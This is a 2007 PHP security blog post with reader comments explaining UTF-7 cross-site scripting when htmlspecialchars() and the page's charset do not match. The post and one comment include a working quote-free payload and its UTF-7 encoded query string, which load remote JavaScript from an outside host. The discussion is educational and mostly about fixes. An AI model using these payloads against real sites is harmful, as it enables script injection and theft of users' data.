About the Author

Chris Shiflett

Hi, I’m Chris: entrepreneur, community leader, husband, and father. I live and work in Boulder, CO.


Character Encoding and XSS

While lamenting Ronaldinho's red card and writing an overdue column for php|architect this weekend, I took a break to read Kevin Yank's latest post, Good and Bad PHP Code.

In the post, he provides a few useful PHP interview questions, including some questions from Yahoo as well as his personal favorite:

In your mind, what are the differences between good PHP code and bad PHP code?

He explains that good PHP code should be:

  • Structured
  • Consistent
  • Portable
  • Secure

He also takes an example of bad PHP code and makes it better, producing this:

<?php
 
if (isset($_GET['query'])) {
    echo '<p>Search results for query: ',
         htmlspecialchars($_GET['query'], ENT_QUOTES),
         '.</p>';
}
 
?>

In the comments, many additional improvements have been suggested, but there's one that has yet to be mentioned. When using htmlspecialchars() without specifying the character encoding, XSS attacks that use UTF-7 are possible. If you've been reading my blog for a while, you can probably put the pieces together yourself, so feel free to give it a go. The only obstacle is the fact that ENT_QUOTES causes all quotes to be escaped, and quotes are consistent between UTF-7 and ISO-8859-1, so you need an example exploit that doesn't use them:

<script src=http://shiflett.org/xss.js>

Web standards pedants might cringe, but this works in most browsers, despite the missing quotes, and the JavaScript returned by xss.js executes within the context of the current page.

To try this out, just save the example PHP code somewhere, then visit it with your browser, including the following value in the query string:

?query=%2BADw-script+src%2BAD0-http%3A%2F%2Fshiflett.org%2Fxss.js%2BAD4-

This only works in browsers that automatically detect the character encoding, but you can mimic the situation by manually setting your browser to use UTF-7 or by sending a Content-Type header that does the same thing:

<?php
 
header('Content-Type: text/html; charset=UTF-7');
 
?>
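To see why escaping alone does not help here, the following minimal sketch decodes the query string shown above and runs it through htmlspecialchars(). It is not part of Kevin's example, and the variable names are only illustrative. The UTF-7 decoding step assumes the mbstring extension, so it is guarded.

```php
<?php

// The query string value from the example above, as the browser sends it.
$raw = '%2BADw-script+src%2BAD0-http%3A%2F%2Fshiflett.org%2Fxss.js%2BAD4-';

// PHP performs this decoding itself when it populates $_GET.
$query = urldecode($raw);

// The payload contains none of <, >, &, ", or ', so escaping changes nothing.
$escaped = htmlspecialchars($query, ENT_QUOTES, 'ISO-8859-1');

var_dump($escaped === $query); // bool(true)

// A browser that treats the page as UTF-7 sees something quite different.
if (function_exists('mb_convert_encoding')) {
    echo mb_convert_encoding($escaped, 'UTF-8', 'UTF-7'), "\n";
}
```

The escaped string is byte-for-byte identical to the input, which is why the attack depends only on how the browser decides to decode the page.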

About this post

Character Encoding and XSS was posted on Tue, 29 May 2007.

15 comments

1. Philip Olson said:

Can you provide a simple example that improves upon that $_GET['query'] example above? One that works on typical PHP 4 and PHP 5 installations. If not, what do you suggest... ext/filter?

Wed, 30 May 2007 at 03:23:38 GMT


2. Christian Matthies said:

Philip, the only thing developers tend to forget about is to specify the character encoding when using htmlspecialchars(). Due to that mistake, UTF-7 attack vectors become possible. That's what Chris tried to point out.

So just use that function with its third argument (e.g., ISO-8859-1) and feel safe.

Wed, 30 May 2007 at 07:41:54 GMT


3. Concerned Citizen said:

Chris, your wording is a little ambiguous, and it sounds like you may have thrown Christian off.

When using htmlspecialchars() without specifying the character encoding, XSS attacks that use UTF-7 are possible.

In that sentence, "specifying the character encoding" refers to the Content-Type header, not (just) the third parameter to htmlentities/specialchars. For example, working from an example from one of the previous posts about the UTF-7 issue:

<?php
 
$string = "<script>alert('XSS');</script>";
 
$string = mb_convert_encoding($string, 'UTF-7');
 
// this:
 
echo htmlentities($string);
 
// is just as vulnerable as this:
 
echo htmlentities($string, ENT_COMPAT, 'UTF-8');
 
?>

In that specific case, ENT_QUOTES would save you because there are single quotes in the JavaScript (you'd get a JavaScript parse error instead of a working exploit), but you'd still have an XSS hole.

What saves you from all these UTF-7 holes (correct me if I'm wrong) is specifying a charset in the Content-Type header, i.e. put this at the top:

<?php
 
header('Content-Type: text/html; charset=UTF-8');
 
// this would work, too:
 
// header('Content-Type: text/html; charset=ISO-8859-1');
 
?>

and you don't need to worry about UTF-7 XSS any more (it'll just show up as garbage).

I'll even go out on a limb and say that the third argument to htmlentities is irrelevant to XSS if you're specifying a charset properly (and that charset isn't UTF-7 or another one where the relevant special characters differ from ASCII; are there any others?).

As a matter of fact, I also can't think of a situation where ENT_QUOTES is necessary, as long as you're putting double quotes around all your html attributes (which you should be) and you're not doing anything silly like:

<?php
 
echo "<a ".htmlentities($_GET['something']).">foo</a>";
 
?>

i.e. inserting user input into a tag but outside of a (properly double-quoted) attribute, which seems odd and is something I've never wanted or needed to do.

So if I were hiring a PHP developer, I wouldn't concern myself with how they use htmlentities/specialchars, as long as they were using it.

Wed, 30 May 2007 at 09:38:37 GMT


4. Concerned Citizen said:

To clarify, my (unproven) assertion is that the charset parameter to htmlentities is irrelevant to security/XSS. On the other hand, there may be encodings where running htmlentities in the default mode would mangle the string. (I don't think UTF-8 is one of these encodings, since in UTF-8 all the bytes in the non-ASCII characters have the high bit set whereas the dangerous characters are single-byte with the high bit off. Which makes me wonder what specifying UTF-8 for the charset in a call to htmlspecialchars actually does...)

Anyway, what I'm saying is that the charset parameter is an i18n tool, not a security tool. That's my assertion, anyway.

Wed, 30 May 2007 at 10:15:41 GMT


5. Christian Matthies said:

Right, I've mixed that up. Forget what I said earlier.

Wed, 30 May 2007 at 10:59:45 GMT


6. Edward Yang said:

It's a bit scary to see the misinformation prevalent about what htmlspecialchars() and htmlentities() do, although I don't blame you guys. Concerned Citizen is right: in some research I did previously, I established that the character encoding parameter in these functions does not actually fix up the character encoding of the string.

But here's the kicker: this behavior is mostly benign, since the usual exploits are extremely difficult to pull off (Chris Shiflett doesn't believe in the seriousness of it). I, personally, balk because it's extremely unclean: your application will not do anything about form feeds, or null bytes, or any of those icky control characters, and they will get passed back to the browser. This is the price you pay for a string format that by default is binary-compatible.

There's no cross-compatible, built-in way to fix this. The typical approach, however, is to use iconv when it is present and roll your own UTF-8 cleaner when it isn't.
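One possible shape for the "roll your own" fallback is sketched here, using PCRE's /u modifier to validate the input rather than iconv. This is an illustration only: clean_utf8_text() is a hypothetical name, the choice of which control characters to strip is an assumption, and the type declarations assume PHP 7.1 or later.

```php
<?php

/**
 * Hypothetical helper: returns the input with control characters removed,
 * or null when the input is not well-formed UTF-8.
 */
function clean_utf8_text(string $input): ?string
{
    // With the /u modifier, PCRE rejects malformed UTF-8 and
    // preg_match() returns false instead of 0 or 1.
    if (preg_match('//u', $input) !== 1) {
        return null;
    }

    // Drop NUL, form feed, and the other C0 controls plus DEL,
    // but keep tab, line feed, and carriage return.
    return preg_replace('/[\x00-\x08\x0B\x0C\x0E-\x1F\x7F]/u', '', $input);
}

var_dump(clean_utf8_text("form\x0Cfeed\x00")); // string(8) "formfeed"
var_dump(clean_utf8_text("\xC3\x28"));         // NULL
```

Rejecting malformed input outright, instead of trying to repair it, keeps the sketch short; an application might prefer to substitute a replacement character.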

Wed, 30 May 2007 at 11:43:52 GMT


7. Tomek said:

Didn't quite have time to get much into the content of the article, but you have made a mistake in the URL about Ronaldinho's red card: you must put 'www' before fcbarcelona.com

And BTW - this red card was well deserved and it's a scandal that they've reduced the punishment :P

Wed, 30 May 2007 at 11:44:53 GMT


8. Chris Shiflett said:

Can you provide a simple example that improves upon that $_GET['query'] example above?

Focusing on the issue at hand, you can be sure the character encodings match by being explicit:

<?php
 
header('Content-Type: text/html; charset=UTF-8');
 
echo htmlentities($_GET['query'], ENT_QUOTES, 'UTF-8'); 
 
?>

In that sentence, "specifying the character encoding" refers to the Content-Type header, not (just) the third parameter to htmlentities/specialchars.

Exactly. In fact, I meant both.

Because both htmlentities() and htmlspecialchars() use ISO-8859-1 by default, you could just make sure that the Content-Type header indicates ISO-8859-1, but I think it's a good habit to be explicit.

Chris Shiflett doesn't believe in the seriousness of it.

Putting words in my mouth? :-)

That's not what I said, and all I meant was that it's difficult to appreciate the problem (IE 6's mishandling of character encoding) when the examples are so contrived.

Your example is pretty clear, and your follow-up response helps clarify the issue further:

The multibyte character issue requires that there already are tags on the page, and that some user-input is being put into the attributes of the tags.

Wed, 30 May 2007 at 12:20:41 GMT


9. Edward Yang said:

Putting words in my mouth? :-)

My apologies. That was the vibe I got from your last post on that thread. And I know another programmer who I greatly respect who stated that I shouldn't worry too much about the advisory.

Because both htmlentities() and htmlspecialchars() use ISO-8859-1 by default, you could just make sure that the Content-Type header indicates ISO-8859-1, but I think it's a good habit to be explicit.

I think a programmer should have wrapper functions for these two functions, so that they can easily change the encoding globally if need be.
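A minimal sketch of what such wrappers might look like follows. The names APP_CHARSET, send_html_header(), and html() are hypothetical, and the syntax assumes PHP 7.1 or later rather than the PHP 4 and 5 installations discussed in this thread.

```php
<?php

// Hypothetical application-wide setting; change the encoding here only.
const APP_CHARSET = 'UTF-8';

// Send the Content-Type header with the application's charset.
function send_html_header(): void
{
    if (!headers_sent()) {
        header('Content-Type: text/html; charset=' . APP_CHARSET);
    }
}

// Escape a value for HTML output using the same charset as the header.
function html(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES, APP_CHARSET);
}

send_html_header();

// Ignore array-style input such as ?query[]=x rather than passing it on.
$query = isset($_GET['query']) && is_string($_GET['query']) ? $_GET['query'] : '';

echo '<p>Search results for query: ', html($query), '.</p>', "\n";
```

Because both the header and the escaping read the same constant, the two cannot drift apart when the encoding changes.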

Wed, 30 May 2007 at 21:42:26 GMT


10. Jon Tan said:

Web standards pedants might cringe, but this works in most browsers

:) Chris, invading my stats with the link text, 'Web standards pedants' is the highest compliment I've had all week *tear*. Hehe.

When using htmlspecialchars() without specifying the character encoding, XSS attacks that use UTF-7 are possible.

Are there any implications in having the character encoding explicitly set to UTF-8? Also, if the question is elementary, can I cite being a webappsec-impaired designer in mitigation?

Thu, 31 May 2007 at 08:41:08 GMT


11. Kanedaaa said:

It doesn't work in Opera 9.20 on Linux, but it works with Firefox 1.5.0.10 (on Linux).

Fri, 01 Jun 2007 at 11:39:15 GMT


12. Ronald van den Heetkamp said:

Many programmers forget about encoding, and so did he. It shows again that not many programmers are aware of the security risks that might emerge. Excellent example. It's good to point this out again, Chris!

http://www.0x000000.com

Sun, 03 Jun 2007 at 17:02:42 GMT


13. Ben Ramsey said:

To explicitly set the charset in your Content-Type header for all PHP pages, make sure the following is set in your php.ini file:

default_charset = "UTF-8"

... or whatever character set you wish to use. This will eliminate the need to set a header() from your application, and it will ensure that the Content-Type headers sent look something like this:

Content-Type: text/html; charset=UTF-8

Are there any implications in having the character encoding explicitly set to UTF-8? Also, if the question is elementary, can I cite being a webappsec-impaired designer in mitigation?

Not an elementary question. I think sometimes the use of UTF-8 confuses people into thinking it's being used as a security measure. The use of UTF-8 isn't for security purposes. You could just as well set your charset to ISO-8859-1. The point from a security standpoint is to escape your output in the same encoding in which your pages are being sent to the client. This means that you should explicitly set the charset in the Content-Type header and specify the same charset in htmlentities()/htmlspecialchars().

Using UTF-8 as your charset simply means you can support the display of multibyte characters in the content you send to the browser. If your charset is set to ISO-8859-1, for example, and you try to send a Unicode character outside that set to the browser, it will render funny.
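As a rough sketch of keeping the two in step, the escaping call can read the same php.ini directive that drives the header. The function name escape_for_page() is hypothetical, and the fallback to UTF-8 when the directive is empty is an assumption made for this example. If default_charset names an encoding that htmlspecialchars() does not support, PHP will emit a warning.

```php
<?php

// Read the charset PHP advertises in the Content-Type header.
// Falling back to UTF-8 for an empty directive is an assumption of this sketch.
$charset = ini_get('default_charset') ?: 'UTF-8';

// Escape output using the charset the page is served in.
function escape_for_page(string $value, string $charset): string
{
    return htmlspecialchars($value, ENT_QUOTES, $charset);
}

echo escape_for_page('<b>"hi"</b>', $charset), "\n";
```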

Wed, 13 Jun 2007 at 02:10:35 GMT


14. Jon Tan said:

...you should explicitly set the charset in the Content-Type header and specify the same charset in htmlentities()/htmlspecialchars().

Thanks Ben. Display of multibyte characters or the possibility of that being required is exactly why I always set UTF-8 by default. In fact until I read this article from Chris I wasn't aware of any other implications. It would feel less than thorough to not be explicit and it's good to know that being explicit is useful regarding XSS too.

Sat, 16 Jun 2007 at 13:59:18 GMT


15. Ludko said:

In that specific case, ENT_QUOTES would save you because there are single quotes in the JavaScript (you'd get a JavaScript parse error instead of a working exploit), but you'd still have an XSS hole.

This would not prevent XSS from running. There is no need to have quotes in the JavaScript to be able to exploit XSS.

<script src=http://shiflett.org/xss.js>

Sat, 08 Dec 2007 at 16:32:57 GMT

